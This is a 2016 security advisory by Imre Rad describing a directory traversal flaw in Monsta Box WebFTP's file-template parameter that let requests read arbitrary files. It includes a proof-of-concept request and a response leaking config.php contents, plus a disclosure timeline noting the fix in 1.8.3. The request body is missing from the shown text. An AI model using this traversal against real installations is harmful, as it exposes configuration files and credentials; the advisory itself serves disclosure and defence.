Monsta Box WebFTP Arbitrary File Read

Type packetstorm
Reporter Imre Rad
Modified 2016-04-08T00:00:00


"MONSTA Box is a lightweight open-source file manager you can install on  
your website or server * to easily manage your files through any browser."  
(Description from the official website  
The Monsta Box WebFTP application supports file templates when creating  
new files. The template parameter is part of the HTTP request so it is a  
user input and it was not sanitized correctly. By sending a HTTP request  
with modified template parameter it was possible to traverse the  
template directory and read arbitrary files (in context of the Monsta  
Box WebFTP application).  
A proof of concept request/response to read the config.php file of the  
Monsta Box installation (note the template parameter of the HTTP request):  
POST /? HTTP/1.1  
Host: somehost  
Referer: http://somereferer/  
Content-Length: 352  
Cookie: PHPSESSID=somecookie  
HTTP/1.1 200 OK  
Server: nginx  
Date: Sun, 27 Mar 2016 19:34:21 GMT  
Content-Type: text/html  
Transfer-Encoding: chunked  
Connection: keep-alive  
X-Frame-Options: SAMEORIGIN  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
Pragma: no-cache  
<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:  
60px; width: 1030px;"><div id="popupHeaderAction">Editing:  
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input  
type="hidden" name="file" value="~/xxx"><textarea name="editContent"  
id="editContent" style="height: 608px;"><?php  
# Open README file for descriptions and help.  
$ftpHost = "somehost";  
$ftpPort = "21";  
Affected versions  
The above vulnerability was fixed in version 1.8.3. Older versions of  
Monsta Box with template support are vulnerable.  
2016-03-29: Vendor contacted for appropriate contact person to report to  
2016-03-30: Vulnerability was reported  
2016-03-31: Fixed version was published  
2016-04-07: Public disclosure  
Discovered by  
Imre RAD